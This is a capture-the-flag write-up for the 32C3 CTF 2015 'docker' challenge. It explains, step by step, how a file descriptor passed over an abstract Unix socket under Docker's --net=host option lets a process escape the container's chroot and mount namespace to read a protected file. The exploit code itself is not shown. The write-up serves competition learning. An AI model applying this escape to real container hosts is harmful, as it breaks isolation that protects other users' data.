32C3 CTF: Docker writeup
docker was a pwnable worth 250 points during 32C3 CTF 2015. The goal was to escape from a (slightly non-standard) docker container configuration.
Here’s the scenario:
We are given ssh access to a box (ssh://eve@136.243.194.40
) as user “eve”. On the box we see the following:
So the goal is pretty clear: read /home/adam/flag
which is only possible as the “adam” user.
The dockerrun binary executes the following command line as root:
Which results in a /bin/bash
being opened in a docker container running as the “adam” user (uid 1337). The docker container lives inside its own mount namespace. We cannot see the “real” /home/adam
(/
is a new mountpoint) and thus cannot access the flag.
Ok.
Exploitation
There is one particularly interesting command line argument to docker: --net=host
. From the documentation:
–net=host — Tells Docker to skip placing the container inside of a separate network stack. In essence, this choice tells Docker to not containerize the container’s networking! While container processes will still be confined to their own filesystem and process list and resource limits, a quick ip addr command will show you that, network-wise, they live “outside” in the main Docker host and have full access to its network interfaces. Note that this does not let the container reconfigure the host network stack — that would require –privileged=true — but it does let container processes open low-numbered ports like any other root process. It also allows the container to access local network services like D-bus. This can lead to processes in the container being able to do unexpected things like restart your computer. You should use this option with caution.
The key information here is that --net=host
allows the container access to networking services on the host!
At this point one needs knowlege of two slightly advanced linux features:
- Abstrack Unix Socket: While “normal” Unix sockets are bound to the filesystem (and thus inaccessible from inside the container), an “abstract” Unix socket lives in its own namespace and thus is accessible from within the container (due to
--net=host
). - File descriptors over Unix sockets: Using this, it is possible to send file descriptors over a Unix socket from one process to another.
See where this is going?
Here’s the plan:
- Open an abstract Unix socket and bind it to some arbitrary name
- Start the docker container
- Inside the docker container, connect to the previously created Unix socket
- From outside, open
/home/adam
(since we cannot directly open/home/adam/flag
) and send it via the Unix socket to the process inside the container - Inside the container we can now
fchdir(received_fd)
thensystem("cat flag")
(or use openat()) and read the flag
To do that I wrote some C code for the server (running outside the container) and the client (running inside the container). I uploaded the source code for the server (since gcc was available), then uploaded the base64 encoded client binary (since no gcc was available) inside the container:
Hm ok, almost. So apparently we also need to break out of a chroot.
Let’s do the following: Instead of just reading the flag after doing fchdir() on the received file descriptor we will instead spawn a bash process and see how things look like.
We will also send a file descriptor for /
instead of /home/adam
this time. Doing this results in this slightly amusing bash prompt:
voilà :)
So why did this work? Inside the docker container our root directory is the mount point created by docker (something like /dev/mapper/docker-8:1-930171-95805d296c80d42164fbe2fb43c6af74e3e894825187831c176cf1918ff3512a on /
). Once we have done fchdir() to the outside root directory we are already outside of our own root directory and can thus move around freely in the filesystem. This is similar to the classic chroot escape which chroot()s itself to a subdirectory and chdir()s to a location outside the new root (but inside the old).
Note that this is however no universal chroot escape: In our case we needed root privileges inside the chroot (the dockerrun binary) to create a new mount namespace. On the other hand, if we try to create a new user namespace, then perform the chroot escape inside of it (where we are root) the kernel will block us (kernel/user_namespace.c):
The code for the server and client can be found in our github repository.